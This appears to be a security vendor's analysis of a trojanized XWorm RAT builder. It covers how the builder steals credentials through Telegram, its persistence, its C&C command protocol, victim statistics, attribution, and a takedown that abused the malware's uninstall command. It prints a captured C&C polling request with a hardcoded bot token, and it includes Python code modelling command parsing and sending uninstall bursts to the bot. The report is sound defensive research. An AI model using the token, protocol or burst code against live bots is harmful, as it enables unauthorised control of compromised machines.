Discover how a trojanized version of the XWorm RAT builder exploited novice cybersecurity enthusiasts, spreading malware through GitHub, Telegram, and file-sharing platforms to compromise over 18,000 devices globally. This malicious tool exfiltrates sensitive data, employs advanced virtualization and registry techniques, and operates via Telegram-based command-and-control servers. Learn about the identified threat actors, their operational methods, and the disruption efforts that leveraged the malware's "kill switch" to mitigate its impact. Stay informed on proactive measures to protect against evolving cybersecurity threats.
A trojanized version of the XWorm RAT builder has been weaponized and propagated. It is targeted specifically at script kiddies who are new to cybersecurity and who directly download and use the tools mentioned in various tutorials, showing that there is no honour among thieves. The malware is spread primarily through a GitHub repository but also through other file-sharing services. It has so far compromised over 18,459 devices globally and is capable of exfiltrating sensitive data such as browser credentials, Discord tokens, Telegram data, and system information. The malware also features advanced functionality, including virtualization checks, registry modifications, and a wide array of commands enabling full control over infected systems. Top victim countries include Russia, USA, India, Ukraine, and Turkey.
The malware uses Telegram as its command-and-control (C&C) infrastructure, leveraging bot tokens and API calls to issue commands to infected devices and exfiltrate stolen data. Analysis revealed the malware has so far exfiltrated more than 1 GB of browser credentials from multiple devices. Researchers also identified the malware's "kill switch" feature, which was leveraged to disrupt operations on active devices.
Disruption efforts targeted the malware's botnet by exploiting its uninstall command. While effective for active devices, limitations such as offline machines and Telegram's rate limiting posed challenges. Attribution efforts linked the operation to a threat actor using aliases such as "@shinyenigma" and "@milleniumrat", as well as GitHub accounts and a ProtonMail address.
The rise of sophisticated Remote Access Trojans (RATs) has amplified cyber threats, with XWorm emerging as a significant example. Recently, a Trojanized XWorm RAT builder has been identified, being propagated by threat actors via multiple channels such as GitHub repositories, file-sharing services, Telegram channels, and forums. This was specifically targeted towards script kiddies who are new to cybersecurity and use tools mentioned in various tutorials. This builder provides attackers with a streamlined tool to deploy and operate a highly capable RAT, which features advanced capabilities like system reconnaissance, data exfiltration, and command execution.
This analysis aims to provide detailed insights into the delivery, functionality, and impact of this Trojanized XWorm RAT builder. By leveraging data exfiltrated via Telegram, we uncovered the infection sources, mapped its command-and-control (C&C) mechanisms, and identified the breadth of its capabilities and the affected devices. Additionally, we conducted disruption activities targeting the botnet infrastructure to mitigate its operations.
We used the Telegram API to forward the messages exfiltrated through the bot to an account under our control. We then ran OCR on the attached images, which were screen captures of the infected devices, and filtered out the URLs they contained. This gave us the following sources of infection:
The malware checks for virtualization on the system by reading registry keys. The keys associated with NdisVirtualBus and VirtualRender are more likely to exist in virtualized environments because they correspond to virtual device interfaces for networking and graphics. If the malware detects that it is running in a virtual environment, it does not carry the infection any further.
XWorm also modifies various registry entries. When the command “/machine_id*startupadd” is called from the C&C server, the malware adds entries to the Windows Registry to ensure it executes upon system startup. By modifying specific registry keys, the malware can automatically run its payload each time the system boots, thereby maintaining continuous access.
The malware uses Telegram as its command-and-control server. The malware executables are hardcoded with a Telegram bot ID and bot token, which are as follows:
Upon first execution, the malware sends a request to "http://ip-api.com/json/" to obtain the IP address and location details of the compromised machine. It then gathers all saved browser passwords and sends them via the sendDocument endpoint of the Telegram API.
The malware then forwards any Discord tokens it has found via the sendMessage endpoint of the Telegram API.
Thereafter, the malware exfiltrates the victim's system information, again via sendMessage.
In some cases, the malware also takes screenshots of the system once it is infected, and it steals Telegram data if Telegram is installed on the device. Finally, it sends a "device connected" message to the Telegram chat along with the location (obtained from ip-api.com) and the machine ID of the compromised device.
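The first-run sequence above (geolocation lookup, then uploads to a bot-token URL) is a usable detection pattern in proxy logs. The following is an added example written for this page, not CloudSEK's own tooling: it scores each client by whether an ip-api.com request is followed within a short window by a sendDocument/sendMessage call to api.telegram.org, and flags any other bot-token traffic at a lower severity. The log format, client addresses, window size and the bot token (shaped like a real one, but invented) are all constructed for the example.

```python
"""Added example, not CloudSEK's own tooling.

Detection logic for the beacon sequence described above, run over constructed
proxy log lines: a geolocation lookup to ip-api.com followed shortly by an
upload to a Telegram bot-token URL. Log format, client addresses and the bot
token are invented (the token is shaped like a real one but is not one).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Bot-token URLs look like /bot<numeric id>:<35-char secret>/<method>.
BOT_CALL_RE = re.compile(r"/bot(?P<bot_id>\d{8,10}):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>[A-Za-z]+)")
GEO_HOSTS = {"ip-api.com"}
TELEGRAM_API = "api.telegram.org"
UPLOAD_METHODS = {"sendDocument", "sendMessage", "sendPhoto"}  # sendPhoto is an assumption
WINDOW = timedelta(seconds=120)  # assumed: how soon after the geo lookup the upload must follow

# Constructed sample: "<ISO timestamp> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2025-01-20T10:00:01Z 10.20.30.41 GET http://ip-api.com/json/ 200
2025-01-20T10:00:03Z 10.20.30.41 POST https://api.telegram.org/bot1234567890:AAEexampleexampleexampleexampleexam/sendDocument 200
2025-01-20T10:00:05Z 10.20.30.41 POST https://api.telegram.org/bot1234567890:AAEexampleexampleexampleexampleexam/sendMessage 200
2025-01-20T10:00:09Z 10.20.30.41 GET https://api.telegram.org/bot1234567890:AAEexampleexampleexampleexampleexam/getUpdates?offset=-1 200
2025-01-20T10:01:00Z 10.20.30.77 GET https://api.telegram.org/bot1234567890:AAEexampleexampleexampleexampleexam/getUpdates?offset=-1 200
2025-01-20T10:02:00Z 10.20.30.88 GET http://ip-api.com/json/ 200
2025-01-20T10:02:10Z 10.20.30.88 GET https://example.com/ 200
"""


def parse_line(line):
    ts, client, _method, url, _status = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), client, url


def analyze(log_text):
    """Return {client: {"severity", "bot_ids", "methods"}} for clients touching bot-token URLs."""
    per_client = defaultdict(list)
    for line in log_text.strip().splitlines():
        ts, client, url = parse_line(line)
        per_client[client].append((ts, url))

    findings = {}
    for client, events in per_client.items():
        events.sort()
        geo_times = [ts for ts, url in events if urlsplit(url).hostname in GEO_HOSTS]
        bot_calls = []
        for ts, url in events:
            m = BOT_CALL_RE.search(url)
            if m and urlsplit(url).hostname == TELEGRAM_API:
                bot_calls.append((ts, m.group("bot_id"), m.group("method")))
        if not bot_calls:
            continue
        # Any bot-token traffic from an endpoint is worth a look; a geo lookup
        # followed by an upload within WINDOW is the stealer's first-run sequence.
        severity = "medium"
        for ts, _, method in bot_calls:
            if method in UPLOAD_METHODS and any(timedelta(0) <= ts - g <= WINDOW for g in geo_times):
                severity = "high"
                break
        findings[client] = {
            "severity": severity,
            "bot_ids": sorted({b for _, b, _ in bot_calls}),  # numeric id only; the secret is not recorded
            "methods": sorted({m for _, _, m in bot_calls}),
        }
    return findings


if __name__ == "__main__":
    for client, finding in analyze(SAMPLE_LOG).items():
        print(client, finding)
```

The token-bearing path is only visible where TLS is inspected; without that, the same logic can be run on DNS or SNI data (api.telegram.org shortly after ip-api.com from a host with no legitimate bot development) at the cost of losing the bot ID.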
Once this data has been exfiltrated, the malware lies dormant, waiting for incoming commands from the C&C server. It uses the getUpdates method of the Telegram API to poll for commands addressed to the infected machine. A command takes the form /machine_id*command; if an attacker sends a message in that format to the Telegram bot, the infected machine with the matching ID picks it up and executes it. Note that the request below polls with offset=-1, which per the Telegram Bot API returns only the newest update in the queue, so a command is only acted on by a machine that happens to poll while that command is the latest message.
Request
GET /bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/getUpdates?offset=-1 HTTP/1.1
Host: api.telegram.org
The malware waiting for commands via the Telegram API's getUpdates method.
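To make the command protocol concrete, here is an added example (not XWorm's code and not CloudSEK's tooling) that models the implant side of the loop: apply the getUpdates offset semantics to a polled response, parse "/machine_id*command" messages, and return what a machine with a given ID would execute. SAMPLE_GETUPDATES is a constructed response; its machine IDs, update IDs and chat ID are invented, and the optional argument tail after the command word is an assumption.

```python
"""Added example, not CloudSEK's tooling or XWorm's own code.

Models the C&C loop described above: the implant polls getUpdates, keeps the
updates Telegram returns for its offset, and acts only on messages of the form
"/<machine_id>*<command>" whose machine ID is its own. SAMPLE_GETUPDATES is a
constructed getUpdates response; the machine IDs, update IDs and chat ID in it
are invented, and the optional "<args>" tail of a command is an assumption.
"""
import json
import re

# "/<machine_id>*<command> [args]": machine ID up to the '*', then the command word.
COMMAND_RE = re.compile(r"^/(?P<machine>[^*\s]+)\*(?P<cmd>\S+)(?:\s+(?P<args>.+))?$", re.S)

SAMPLE_GETUPDATES = json.dumps({
    "ok": True,
    "result": [
        {"update_id": 90021, "message": {"message_id": 501, "date": 1737400000,
                                         "chat": {"id": 7000000001}, "text": "/ABC123DEF*startupadd"}},
        {"update_id": 90022, "message": {"message_id": 502, "date": 1737400030,
                                         "chat": {"id": 7000000001}, "text": "hello bot"}},
        {"update_id": 90023, "message": {"message_id": 503, "date": 1737400060,
                                         "chat": {"id": 7000000001}, "text": "/ZZZ999*uninstall"}},
        {"update_id": 90024, "message": {"message_id": 504, "date": 1737400090,
                                         "chat": {"id": 7000000001}, "text": "/ABC123DEF*uninstall"}},
    ],
})


def select_updates(updates, offset):
    """Apply the offset semantics documented for getUpdates: offset >= 0 returns
    updates with update_id >= offset; a negative offset returns only the last
    |offset| updates in the queue (offset=-1, as in the captured request, is
    therefore just the newest message)."""
    if offset < 0:
        return updates[offset:]
    return [u for u in updates if u["update_id"] >= offset]


def parse_command(text):
    """Return (machine_id, command, args) for a C&C message, or None for chatter."""
    m = COMMAND_RE.match(text or "")
    if not m:
        return None
    return m.group("machine"), m.group("cmd"), m.group("args")


def commands_for_machine(raw_response, machine_id, offset=-1):
    """What one implant with this machine ID would execute from a poll at this offset."""
    data = json.loads(raw_response)
    if not data.get("ok"):
        return []
    found = []
    for upd in select_updates(data.get("result", []), offset):
        parsed = parse_command((upd.get("message") or {}).get("text"))
        if parsed and parsed[0] == machine_id:
            found.append((parsed[1], parsed[2]))
    return found


def all_commands(raw_response):
    """Analyst view: every (update_id, machine_id, command) in a full dump."""
    data = json.loads(raw_response)
    rows = []
    for upd in data.get("result", []):
        parsed = parse_command((upd.get("message") or {}).get("text"))
        if parsed:
            rows.append((upd["update_id"], parsed[0], parsed[1]))
    return rows


def next_offset(raw_response):
    """Offset to pass on the next poll to walk the queue forward without losing updates."""
    ids = [u["update_id"] for u in json.loads(raw_response).get("result", [])]
    return max(ids) + 1 if ids else 0


if __name__ == "__main__":
    print("implant ABC123DEF, offset=-1:", commands_for_machine(SAMPLE_GETUPDATES, "ABC123DEF"))
    print("implant ZZZ999, offset=-1:", commands_for_machine(SAMPLE_GETUPDATES, "ZZZ999"))
    print("analyst dump:", all_commands(SAMPLE_GETUPDATES))
```

Run against the sample, the ZZZ999 implant polling with offset=-1 never sees its uninstall because a later message has already displaced it, which is the mechanism behind the message bursts described later. One caveat for analysts: every consumer of a bot token shares one update queue, and a getUpdates call with a positive offset confirms (and removes) everything below it, so polling a live token this way changes what the implants see.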
The exhaustive list of commands that the infected machines obey are as follows:
Using a certain technique, we were able to dump all of the data that the malware had exfiltrated via Telegram. Our findings show that the malware has so far compromised more than 18,459 devices. The top five countries affected by the trojanized RAT builder are as follows:
However, of the 18,459+ infected devices, browser credentials have been stolen from only 2,068 so far. The data exfiltrated by the malware is as follows:
In one instance each, a PDF and an MP3 file were downloaded from a victim, apparently just to test whether they contained anything sensitive. The volume-wise breakdown of the exfiltrated data is as follows:
The infected machines functioned as a botnet, listening for commands via the Telegram API. During our observation we found that the malware has a feature that acts as a "kill switch" of sorts, which can be invoked through Telegram messages sent to the bot by the threat actors.
The malware includes a /uninstall command, which the threat actor had used in the past to remove the infection from a machine by its machine ID.
So, three things were required to remove the infection from a device:
We had the machine IDs collected from the chats, and we obtained the Telegram bot's username via the getMe endpoint of the Telegram API. Combining the two, we sent two bursts of messages to the bot:
During that window, any machine that was actively listening for messages and whose machine ID matched would remove the malware from itself. The screenshot below shows the getUpdates response that such a machine would see at the time of our message bursts.
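The disruption procedure above, as an added example that is not CloudSEK's actual tooling: build one "/machine_id*uninstall" message per distinct machine ID, send the batch in repeated bursts, and honour Telegram's retry-after when throttled (the rate limiting the page names as a constraint). The machine IDs and the sender are constructed; in a real run the injected send function would deliver each text to the bot's username (from getMe) from a Telegram user account, and the wait time would come from Telegram's response rather than a fixed value.

```python
"""Added example, not CloudSEK's disruption tooling.

Builds the "/<machine_id>*uninstall" messages for a set of machine IDs and sends
them in repeated bursts through an injected sender, backing off on the rate
limits the page cites as a constraint. Machine IDs and the fake sender are
constructed; in a real run `send` would deliver each text to the bot's
username (from getMe) from a Telegram user account, and the retry-after value
would come from Telegram's response.
"""
import time


class RateLimited(Exception):
    """Raised by a sender when Telegram asks the client to wait before sending more."""

    def __init__(self, retry_after):
        super().__init__(f"retry after {retry_after}s")
        self.retry_after = retry_after


def parse_retry_after(response):
    """Bot API 429 bodies carry parameters.retry_after (seconds); None if not rate limited."""
    if response.get("ok") is False and response.get("error_code") == 429:
        return int(response.get("parameters", {}).get("retry_after", 1))
    return None


def build_uninstall_commands(machine_ids):
    """One "/<id>*uninstall" per distinct, non-empty machine ID, preserving order."""
    seen, commands = set(), []
    for mid in machine_ids:
        mid = mid.strip()
        if mid and mid not in seen:
            seen.add(mid)
            commands.append(f"/{mid}*uninstall")
    return commands


def send_burst(commands, send, rounds=2, max_retries=5, sleep=time.sleep):
    """Send every command `rounds` times. `send(text)` raises RateLimited(retry_after)
    when throttled; the wait is honoured and the same message retried. Repeating
    the burst matters because an implant polling with offset=-1 only sees the
    newest message, so each machine's command must be the latest one at some
    moment when that machine polls."""
    delivered, failed, waited = [], [], 0
    for _ in range(rounds):
        for text in commands:
            for _attempt in range(max_retries + 1):
                try:
                    send(text)
                except RateLimited as exc:
                    waited += exc.retry_after
                    sleep(exc.retry_after)
                    continue
                delivered.append(text)
                break
            else:
                failed.append(text)
    return {"delivered": delivered, "failed": failed, "waited_s": waited}


if __name__ == "__main__":
    # Constructed stand-in for a real sender: throttles every fourth message.
    sent = []

    def demo_send(text):
        sent.append(text)
        if len(sent) % 4 == 0:
            raise RateLimited(2)

    cmds = build_uninstall_commands(["A1B2C3", "D4E5F6", "A1B2C3", "G7H8I9"])
    print(send_burst(cmds, demo_send, sleep=lambda s: None))
```

Whatever the burst count, a machine that is offline or not polling at the right moment is missed, and a message that reaches the bot but is answered with a retry-after still counts against the sending account, so the total wait grows with the size of the ID list.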
In the initial few messages dumped from the telegram bot, we saw that there was a .rdp file uploaded to an infected machine by the threat actors. It can be said with moderate confidence that it was being used for testing purposes by the threat actors. The AWS address in the RDP file was “ec2-18-191-85-60.us-east-2.compute.amazonaws.com”.
From the commit messages on the repositories where the threat actor shared the trojanized RAT builder, we obtained the following email address: [email protected]. In the past the same threat actor has used multiple GitHub accounts, such as:
Telegram Channel Username offering the RAT: @milleniumrat
Telegram username of the threat actor: @shinyenigma